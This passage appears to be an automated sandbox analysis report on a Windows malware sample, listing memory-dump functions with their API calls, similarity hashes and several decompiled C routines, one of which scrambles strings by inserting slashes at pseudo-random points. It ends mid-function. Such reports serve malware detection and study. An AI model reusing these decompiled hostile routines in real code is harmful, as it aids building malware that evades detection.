Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: CriticalErrorLastSection$EnterLeave
String ID:
API String ID: 2124651672-0
Opcode ID: 9bbb6b375c68a9eea8934ed3d7bae2245fd558ad56793dd00bfd16eaccb309b4
Instruction ID: 9ecd18936453cba6e69a600b40eba8a40db0f4cfda5ee29cc09c99a7eec828aa
Opcode Fuzzy Hash: 9bbb6b375c68a9eea8934ed3d7bae2245fd558ad56793dd00bfd16eaccb309b4
Instruction Fuzzy Hash: F0212B35501209EFCB129FA9DC48E9E7BB8FF44751B158195F829A3220CB30DD56DF50

Uniqueness

Uniqueness Score: -1.00%

Function 00B59807, Relevance: 6.1, APIs: 4, Instructions: 70fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00B58AB5: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,74E04DE0,00000000), ref: 00B58ADB

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00B59859
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,00B5DD5B,?), ref: 00B5986B
ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,?,?,?,00B5DD5B,?), ref: 00B59883
CloseHandle.KERNEL32(?,?,?,?,?,?,00B5DD5B,?), ref: 00B5989E

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: File$CloseCreateHandleModuleNamePointerRead
String ID:
API String ID: 1352878660-0
Opcode ID: fac3bf4a7b872df4e4da79c150b21261208f1c3e812907ac734a76c57aba6b45
Instruction ID: e831b03e9acd3f9c51bc046bd44cf3368e8b1e0d609f960879756f1f4a0a94ce
Opcode Fuzzy Hash: fac3bf4a7b872df4e4da79c150b21261208f1c3e812907ac734a76c57aba6b45
Instruction Fuzzy Hash: 36115E71A01118FBDF21AF65CC89FEF7EACEF02795F1441A5F919E2060D7318A44CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B6D85B, Relevance: 6.1, APIs: 4, Instructions: 68stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00B8065C,00B807F4,00000402,00B807F4), ref: 00B6D893

Part of subcall function 00B55E9A: RtlAllocateHeap.NTDLL(00000000,00000001,00B6295C), ref: 00B55EA6

lstrcpy.KERNEL32(00000000,00B8065C), ref: 00B6D8AA
StrChrA.SHLWAPI(00000000,0000002E), ref: 00B6D8B3
GetModuleHandleA.KERNEL32(00000000), ref: 00B6D8D1

Part of subcall function 00B6889B: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,00000000,00000005,00B6A538,?,00B8065C,00B6A538,?,00000000,00000004,00B68D1F,?,810C74C3), ref: 00B68973
Part of subcall function 00B6889B: VirtualProtect.KERNELBASE(00B807F4,00000004,00B68D1F,00B68D1F,00B6A538,?,00000000,00000004,00B68D1F,?,810C74C3,00000000,?,00B7D580,0000001C,00B5B898), ref: 00B6898E
Part of subcall function 00B6889B: RtlEnterCriticalSection.NTDLL(00B81460), ref: 00B689B3

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: ProtectVirtual$AllocateCriticalEnterHandleHeapModuleSectionlstrcpylstrlen
String ID:
API String ID: 105881616-0
Opcode ID: 06cbf13cec303bcdc7bd99c145c49a145f9912dc2c478fe8528c6b4c6d3bd987
Instruction ID: 3b5c3e1065320a72ce2105b272d077dd2f565e8a620068821c49f42bfac41c94
Opcode Fuzzy Hash: 06cbf13cec303bcdc7bd99c145c49a145f9912dc2c478fe8528c6b4c6d3bd987
Instruction Fuzzy Hash: BC211A74E00209EFCB15DF68C849BAEBBF8EF44344F108499E45AD72A1DB78DA45DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00B533DF, Relevance: 6.1, APIs: 4, Instructions: 68stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?), ref: 00B533EF

Part of subcall function 00B55E9A: RtlAllocateHeap.NTDLL(00000000,00000001,00B6295C), ref: 00B55EA6

WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000,00000001), ref: 00B53411
lstrcpyW.KERNEL32(00000000,?), ref: 00B5343D
lstrcatW.KERNEL32(00000000,?), ref: 00B53450

Part of subcall function 00B6F51A: strstr.NTDLL ref: 00B6F5F2
Part of subcall function 00B6F51A: strstr.NTDLL ref: 00B6F645

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: strstr$AllocateByteCharHeapMultiWidelstrcatlstrcpylstrlen
String ID:
API String ID: 3712611166-0
Opcode ID: 5daab9eb3c798dffc4b0fb5c78772a01e09eefa2947efcb619f12aaf89525133
Instruction ID: fe5d005915bff8d280c22d6f2c8f1c42f5e067c301a4f440402fecdc438fbd3f
Opcode Fuzzy Hash: 5daab9eb3c798dffc4b0fb5c78772a01e09eefa2947efcb619f12aaf89525133
Instruction Fuzzy Hash: 53111776500119BFCB11AFA4DC89D9E7BECEF05395B0080A5F919A6220DB30DE46CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B53FD9, Relevance: 6.1, APIs: 4, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 00B53FF4
RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00B54018
RegCloseKey.ADVAPI32(?), ref: 00B54070

Part of subcall function 00B55E9A: RtlAllocateHeap.NTDLL(00000000,00000001,00B6295C), ref: 00B55EA6

RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?), ref: 00B54041

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: QueryValue$AllocateCloseHeapOpen
String ID:
API String ID: 453107315-0
Opcode ID: c00acfb4a063d473efa6fa00636cc01d008fa69f6d541904c1fb248c2a6f357f
Instruction ID: 41956d4bfcc204111d70e9343aaa8998e7240ad7f081f95b28bc0fd3ee817148
Opcode Fuzzy Hash: c00acfb4a063d473efa6fa00636cc01d008fa69f6d541904c1fb248c2a6f357f
Instruction Fuzzy Hash: 9F21F4B5800108FFCB11EF94D8849EEBBB9EB88355F248496F902A7150D7719E89DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00B026DD, Relevance: 6.1, APIs: 4, Instructions: 61
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00B026DD(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0xb0d270, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0xb0d288; // 0x1348d7c3
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0xb0d288 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

0x00b026e5
0x00b026e8
0x00b026ee
0x00b02706
0x00b02708
0x00b0270d
0x00b0270f
0x00b02712
0x00b02714
0x00b02717
0x00b02719
0x00b02719
0x00b0271b
0x00b02726
0x00b0272b
0x00b0273c
0x00b02744
0x00b02749
0x00b0274c
0x00b0274f
0x00b02751
0x00b02754
0x00b02757
0x00b02757
0x00b0275a
0x00b02765
0x00b0276a
0x00b02774

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00B01A07,00000000,?,?,00B04653,?,018D95B0), ref: 00B026E8
RtlAllocateHeap.NTDLL(00000000,?), ref: 00B02700
memcpy.NTDLL(00000000,?,-00000008,?,?,?,00B01A07,00000000,?,?,00B04653,?,018D95B0), ref: 00B02744
memcpy.NTDLL(00000001,?,00000001), ref: 00B02765

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: 88af5aa7d7ea647e346a9cca4e13c80a4675fb039bb3d1b7d08a58a70afa114a
Instruction ID: d178976345c1ec06c45bd74a3e6b5a4ad89a6dab90537734b297d86292f8777a
Opcode Fuzzy Hash: 88af5aa7d7ea647e346a9cca4e13c80a4675fb039bb3d1b7d08a58a70afa114a
Instruction Fuzzy Hash: BF11C672A00214AFC714CBA9DC88D9EBFEEEB90360B1502B6F504D71A1EB709E049760

Uniqueness

Uniqueness Score: -1.00%

Function 00B5C100, Relevance: 6.1, APIs: 4, Instructions: 57COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000001,?,?,?,00B6FE3D,00000000,00000000), ref: 00B5C11E
GetLastError.KERNEL32(?,?,?,00B6FE3D,00000000,00000000,00000000,00000000,0000001E,0000001E,?,?,?,00B6BDBD,?,0000001E), ref: 00B5C126

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: ByteCharErrorLastMultiWide
String ID:
API String ID: 203985260-0
Opcode ID: d434b0c4b1b224c969f50792fc1448bd0ffe0732ffdc03642b0130a9ea433b2d
Instruction ID: 06c5d31b8a671ada64a2213a158ae18eea4a7aded273627db608196b6e64ee23
Opcode Fuzzy Hash: d434b0c4b1b224c969f50792fc1448bd0ffe0732ffdc03642b0130a9ea433b2d
Instruction Fuzzy Hash: CE01D8351047507F8621AA365C4CD1BBFEDEBC6771B200B99FD75A3141CA204808CA71

Uniqueness

Uniqueness Score: -1.00%

Function 00B53186, Relevance: 6.1, APIs: 4, Instructions: 56stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?), ref: 00B5319A

Part of subcall function 00B55E9A: RtlAllocateHeap.NTDLL(00000000,00000001,00B6295C), ref: 00B55EA6

mbstowcs.NTDLL ref: 00B531B4
lstrlen.KERNEL32(?), ref: 00B531BF
mbstowcs.NTDLL ref: 00B531D9

Part of subcall function 00B5BAF2: lstrlenW.KERNEL32(?,00000000,74E069A0,?,00000250,?,00000000), ref: 00B5BB3E
Part of subcall function 00B5BAF2: lstrlenW.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000006,?), ref: 00B5BB4A
Part of subcall function 00B5BAF2: memset.NTDLL ref: 00B5BB92
Part of subcall function 00B5BAF2: FindFirstFileW.KERNEL32(00000000,00000000), ref: 00B5BBAD
Part of subcall function 00B5BAF2: lstrlenW.KERNEL32(0000002C), ref: 00B5BBE5
Part of subcall function 00B5BAF2: lstrlenW.KERNEL32(?), ref: 00B5BBED
Part of subcall function 00B5BAF2: memset.NTDLL ref: 00B5BC10
Part of subcall function 00B5BAF2: wcscpy.NTDLL ref: 00B5BC22

Part of subcall function 00B70757: RtlFreeHeap.NTDLL(00000000,00000000,00B629D3,00000000), ref: 00B70763

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: lstrlen$Heapmbstowcsmemset$AllocateFileFindFirstFreewcscpy
String ID:
API String ID: 1961997177-0
Opcode ID: ccbf92cd263db2834191947bd6976e85e04ec7874c0a13438a9ee5f6b88d214b
Instruction ID: 552637d34bd540888ef41892c9f53b4a9bb0efc7f0fdc56f371ddb3af6de62c4
Opcode Fuzzy Hash: ccbf92cd263db2834191947bd6976e85e04ec7874c0a13438a9ee5f6b88d214b
Instruction Fuzzy Hash: 6F019E33500605F7CB21ABA59C86F8B7FEDDF84751F1084A6FA15A6102EA75DE048BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B60C51, Relevance: 6.0, APIs: 4, Instructions: 50memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,7673D3B0,?,74E05520,00B52073,00000000,?,?,?), ref: 00B60C58
RtlAllocateHeap.NTDLL(00000000,0000000D), ref: 00B60C70
memcpy.NTDLL(0000000C,?,00000001), ref: 00B60C86

Part of subcall function 00B755C4: StrChrA.SHLWAPI(?,?,7673D3B0,0434C0D4,00000000,?,00B641F5,?,00000020,0434C0D4), ref: 00B755E9
Part of subcall function 00B755C4: StrTrimA.SHLWAPI(?,00B7D49C,00000000,?,00B641F5,?,00000020,0434C0D4), ref: 00B75608
Part of subcall function 00B755C4: StrChrA.SHLWAPI(?,?,?,00B641F5,?,00000020,0434C0D4), ref: 00B75614

HeapFree.KERNEL32(00000000,00000000,0000000C,00000020,00000000), ref: 00B60CB8

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: Heap$AllocateFreeTrimlstrlenmemcpy
String ID:
API String ID: 3208927540-0
Opcode ID: 946ea38d4978b17ed3671817102b185b98d9ef058c9745ab786f23930360c78f
Instruction ID: f9f892e531137a602f75d3e453f8c0911242154419800946a0b803a7f30a7b02
Opcode Fuzzy Hash: 946ea38d4978b17ed3671817102b185b98d9ef058c9745ab786f23930360c78f
Instruction Fuzzy Hash: 5D012B71201701EBE7315B16DC84F2B7BEDEB80751F108565F659961B0CB749849EB60

Uniqueness

Uniqueness Score: -1.00%

Function 00B70D43, Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 00B55E9A: RtlAllocateHeap.NTDLL(00000000,00000001,00B6295C), ref: 00B55EA6

RtlInitializeCriticalSection.NTDLL(00B81460), ref: 00B70D67
RtlInitializeCriticalSection.NTDLL(00B81440), ref: 00B70D7D
GetVersion.KERNEL32(?,?,?,?,?,?,?,00B577C7,?,?,?,?,?), ref: 00B70D8E
GetModuleHandleA.KERNEL32(00001623,?,?,?,?,?,?,?,00B577C7,?,?,?,?,?), ref: 00B70DC2

Part of subcall function 00B62558: GetModuleHandleA.KERNEL32(?,00000001,77639EB0,00000000,?,?,?,?,00000000,00B70DA5), ref: 00B62570
Part of subcall function 00B62558: LoadLibraryA.KERNEL32(?), ref: 00B62611
Part of subcall function 00B62558: FreeLibrary.KERNEL32(00000000), ref: 00B6261C

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: CriticalHandleInitializeLibraryModuleSection$AllocateFreeHeapLoadVersion
String ID:
API String ID: 1711133254-0
Opcode ID: 451b9f06742a2a840cfbb57e75d99fa8d5d435aa6da27086a8fd4ee814e94dbd
Instruction ID: 7e441b0a4d2587f428b436289cd961315a0ef649bfe857d996d88d7f3e70b815
Opcode Fuzzy Hash: 451b9f06742a2a840cfbb57e75d99fa8d5d435aa6da27086a8fd4ee814e94dbd
Instruction Fuzzy Hash: D3112776A62301CBD720AFAEAC88A4537ECA7483547444C7AEA19E3230CF706846CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00B522D4, Relevance: 6.0, APIs: 4, Instructions: 49sleepCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(00B81488), ref: 00B522DF
Sleep.KERNEL32(0000000A), ref: 00B522E9
SetEvent.KERNEL32 ref: 00B52340
RtlLeaveCriticalSection.NTDLL(00B81488), ref: 00B5235F

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: CriticalSection$EnterEventLeaveSleep
String ID:
API String ID: 1925615494-0
Opcode ID: 61ac5e0f9b0152c4b62e4e3b93109e595416d248897c3924c08fd259962bd90f
Instruction ID: 85e1d02121d6062657cbd6e1e499a1bfed920d50816e5337bdc5dee9f90deb57
Opcode Fuzzy Hash: 61ac5e0f9b0152c4b62e4e3b93109e595416d248897c3924c08fd259962bd90f
Instruction Fuzzy Hash: 7D01D271A42204EFE710AB64DC49F5A3BECEB15792F0004A1FB09E71A0DB748909CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00B54A1D, Relevance: 6.0, APIs: 4, Instructions: 48fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00B5B10E: lstrlen.KERNEL32(00000000,00000000,00000000,00B776BF,?,00000000,?,?,00000000,?,?,00000000,?,?,00000000), ref: 00B5B113
Part of subcall function 00B5B10E: RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 00B5B128
Part of subcall function 00B5B10E: wsprintfA.USER32 ref: 00B5B144
Part of subcall function 00B5B10E: HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 00B5B160

CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00B54A4B
GetFileSize.KERNEL32(00000000,00000000), ref: 00B54A5A
CloseHandle.KERNEL32(00000000), ref: 00B54A64
GetLastError.KERNEL32 ref: 00B54A6C

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: FileHeap$AllocateCloseCreateErrorFreeHandleLastSizelstrlenwsprintf
String ID:
API String ID: 4042893638-0
Opcode ID: 14f8fdaa5bfea81e0b18392aca0053ba156e2fb233b6885de6398ee7a08fb6a8
Instruction ID: 08affbf18d119241861575e563f3b5647407dc63f149cac93b2b4b9ab807fef8
Opcode Fuzzy Hash: 14f8fdaa5bfea81e0b18392aca0053ba156e2fb233b6885de6398ee7a08fb6a8
Instruction Fuzzy Hash: 74F04432140218BBD3602B66DC8EF9F7EACEF01762F10419AF90AD2090DB3085C986A4

Uniqueness

Uniqueness Score: -1.00%

Function 00B5AB3D, Relevance: 6.0, APIs: 4, Instructions: 41memorystringCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(00B810C0,00000000), ref: 00B5AB49
RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 00B5AB64
lstrcpy.KERNEL32(00000000,?), ref: 00B5AB8D
HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,?,00B577C7,?), ref: 00B5ABAE

Part of subcall function 00B77C17: SetEvent.KERNEL32(?,?,00B5F0A9), ref: 00B77C2C
Part of subcall function 00B77C17: WaitForSingleObject.KERNEL32(?,000000FF,?,?,00B5F0A9), ref: 00B77C4C
Part of subcall function 00B77C17: CloseHandle.KERNEL32(00000000,?,00B5F0A9), ref: 00B77C55
Part of subcall function 00B77C17: CloseHandle.KERNEL32(?,?,?,00B5F0A9), ref: 00B77C5F
Part of subcall function 00B77C17: RtlEnterCriticalSection.NTDLL(?), ref: 00B77C67
Part of subcall function 00B77C17: RtlLeaveCriticalSection.NTDLL(?), ref: 00B77C7F
Part of subcall function 00B77C17: CloseHandle.KERNEL32(?), ref: 00B77C9B
Part of subcall function 00B77C17: LocalFree.KERNEL32(?), ref: 00B77CA6
Part of subcall function 00B77C17: RtlDeleteCriticalSection.NTDLL(?), ref: 00B77CB0

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: CloseCriticalHandleSection$FreeHeap$AllocateDeleteEnterEventExchangeInterlockedLeaveLocalObjectSingleWaitlstrcpy
String ID:
API String ID: 1103286547-0
Opcode ID: 6370f9932e45795fa09f2e68aa73483538902ac70a83ae1a283b8cd7abf0dd91
Instruction ID: 88def9ac3435702b299810831b12ec506fddb923b04944dded23983f9a1ca814
Opcode Fuzzy Hash: 6370f9932e45795fa09f2e68aa73483538902ac70a83ae1a283b8cd7abf0dd91
Instruction Fuzzy Hash: 58F0FC3234131067D7302765AC0EF4B3E9EEB45751F040591FB08E71F0CE248886CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00B6A6CD, Relevance: 6.0, APIs: 4, Instructions: 39filesynchronizationpipeCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001,0000003A,00B6B998,000000FF,0434B7F0,?,?,00B5B905,0000003A,0434B7F0), ref: 00B6A6E9
GetLastError.KERNEL32(?,?,00B5B905,0000003A,0434B7F0,?,?,?,00B54C3E,00000000,?,7673D3B0,74E05520), ref: 00B6A6F4
WaitNamedPipeA.KERNEL32(00002710), ref: 00B6A716
WaitForSingleObject.KERNEL32(00000000,?,?,00B5B905,0000003A,0434B7F0,?,?,?,00B54C3E,00000000,?,7673D3B0,74E05520), ref: 00B6A724

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: Wait$CreateErrorFileLastNamedObjectPipeSingle
String ID:
API String ID: 4211439915-0
Opcode ID: 6a08559cd621c6e3fc2d0b8a0a2b65402a2efbd187a58d93f6529d4a573b8ad9
Instruction ID: d64f4ece3d0487b93c953d47323d1a80990122e727ee8e45cf574c323d1b5761
Opcode Fuzzy Hash: 6a08559cd621c6e3fc2d0b8a0a2b65402a2efbd187a58d93f6529d4a573b8ad9
Instruction Fuzzy Hash: 56F06D32601120ABD7302B68AC8CF677EA9EB113B2F114661FA2DF71B0CB245C91DF91

Uniqueness

Uniqueness Score: -1.00%

Function 00B5B10E, Relevance: 6.0, APIs: 4, Instructions: 38memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00B776BF,?,00000000,?,?,00000000,?,?,00000000,?,?,00000000), ref: 00B5B113
RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 00B5B128
wsprintfA.USER32 ref: 00B5B144

Part of subcall function 00B6241D: memset.NTDLL ref: 00B62432
Part of subcall function 00B6241D: lstrlenW.KERNEL32(00000000,00000000,00000000,7764DBB0,00000020,00000000), ref: 00B6246B
Part of subcall function 00B6241D: wcstombs.NTDLL ref: 00B62475
Part of subcall function 00B6241D: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,7764DBB0,00000020,00000000), ref: 00B624A6
Part of subcall function 00B6241D: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00B57B15), ref: 00B624D2
Part of subcall function 00B6241D: TerminateProcess.KERNEL32(?,000003E5), ref: 00B624E8
Part of subcall function 00B6241D: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00B57B15), ref: 00B624FC
Part of subcall function 00B6241D: CloseHandle.KERNEL32(?), ref: 00B6252F
Part of subcall function 00B6241D: CloseHandle.KERNEL32(?), ref: 00B62534

HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 00B5B160

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: CloseHandleHeapMultipleObjectsProcessWaitlstrlen$AllocateCreateFreeTerminatememsetwcstombswsprintf
String ID:
API String ID: 1624158581-0
Opcode ID: 784bd65cebbbae808e1b549e36444a5a05f1e532526e548148c3e7c90ca0a9c8
Instruction ID: 9a1b912a71bd46e3c692edba62be27131b1878956a0b3b9ef3bf30a8fb8dd49c
Opcode Fuzzy Hash: 784bd65cebbbae808e1b549e36444a5a05f1e532526e548148c3e7c90ca0a9c8
Instruction Fuzzy Hash: B6F0E9316014107BC261171DBC0DF6B3AADDFC2B21F1501A5F905E72B0CF208846CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00B641A8, Relevance: 6.0, APIs: 4, Instructions: 30sleepmemoryCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(0434C0A0), ref: 00B641B1
Sleep.KERNEL32(0000000A), ref: 00B641BB
HeapFree.KERNEL32(00000000,?), ref: 00B641E3
RtlLeaveCriticalSection.NTDLL(0434C0A0), ref: 00B64201

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: a6d9aad293c8969c4a646846522e56a488ba210c77e111794708b678ab8f77d9
Instruction ID: 8e65bc244ad21ee6170aad2e66b581aff7d9d4e69f24c289b1cbea125ae5badb
Opcode Fuzzy Hash: a6d9aad293c8969c4a646846522e56a488ba210c77e111794708b678ab8f77d9
Instruction Fuzzy Hash: 30F05E79201640DFD7209B2AEC49F063BE9EB21701F048885F419D72B1CB34D889CF14

Uniqueness

Uniqueness Score: -1.00%

Function 00B04450, Relevance: 6.0, APIs: 4, Instructions: 29
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B04450() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0xb0d2a4; // 0x1f4
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0xb0d2f4; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0xb0d2a4; // 0x1f4
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0xb0d270; // 0x14e0000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}

0x00b04450
0x00b04457
0x00b044a1
0x00b044a3
0x00b044a3
0x00b0445b
0x00b04461
0x00b04466
0x00b0446a
0x00b04470
0x00b04477
0x00000000
0x00000000
0x00b04479
0x00b0447e
0x00000000
0x00000000
0x00000000
0x00b0447e
0x00b04480
0x00b04488
0x00b0448b
0x00b0448b
0x00b04491
0x00b04498
0x00b0449b
0x00b0449b
0x00000000

APIs

SetEvent.KERNEL32(000001F4,00000001,00B0191C), ref: 00B0445B
SleepEx.KERNEL32(00000064,00000001), ref: 00B0446A
CloseHandle.KERNEL32(000001F4), ref: 00B0448B
HeapDestroy.KERNEL32(014E0000), ref: 00B0449B

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseDestroyEventHandleHeapSleep
String ID:
API String ID: 4109453060-0
Opcode ID: 12038131e3abe59642dbb782ee0600789b6c971d5ccb63f99787b890ee1d2b88
Instruction ID: 6fdaf8bf6978af8ab4d0ffc7ee7d01b986e8c918b3549c796a1cc7406860231e
Opcode Fuzzy Hash: 12038131e3abe59642dbb782ee0600789b6c971d5ccb63f99787b890ee1d2b88
Instruction Fuzzy Hash: FFF0ACB1B013129BDB206B79ED48B4A3EECEB24761B054694B905D76E0EF60D845C660

Uniqueness

Uniqueness Score: -1.00%

Function 00B71684, Relevance: 6.0, APIs: 4, Instructions: 28sleepmemoryCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(0434C0A0), ref: 00B7168D
Sleep.KERNEL32(0000000A), ref: 00B71697
HeapFree.KERNEL32(00000000), ref: 00B716C5
RtlLeaveCriticalSection.NTDLL(0434C0A0), ref: 00B716DA

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: 0c3fe26e506202b5377619475754c71e296d2aac9608a40099042a4e0058ba46
Instruction ID: 156af3d09c6d80c3cb452ca74d4220ad477dcdb6631847a54cb1fdf935200d87
Opcode Fuzzy Hash: 0c3fe26e506202b5377619475754c71e296d2aac9608a40099042a4e0058ba46
Instruction Fuzzy Hash: 10F0B778201240DFE7589F1EDC49F2677A9EB04741B088899E81AD7370CB34EC86EF25

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A1AD7, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E1A1AD7(void* __ecx, WCHAR** _a4) {
				struct HINSTANCE__* _v8;
				long _v12;
				long _t10;
				long _t19;
				long _t20;
				WCHAR* _t23;

				_v8 =  *0x6e1a41b0;
				_t19 = 0x104;
				_t23 = E6E1A1000(0x208);
				if(_t23 == 0) {
					L8:
					_t20 = 8;
					L9:
					return _t20;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t10 = GetModuleFileNameW(_v8, _t23, _t19);
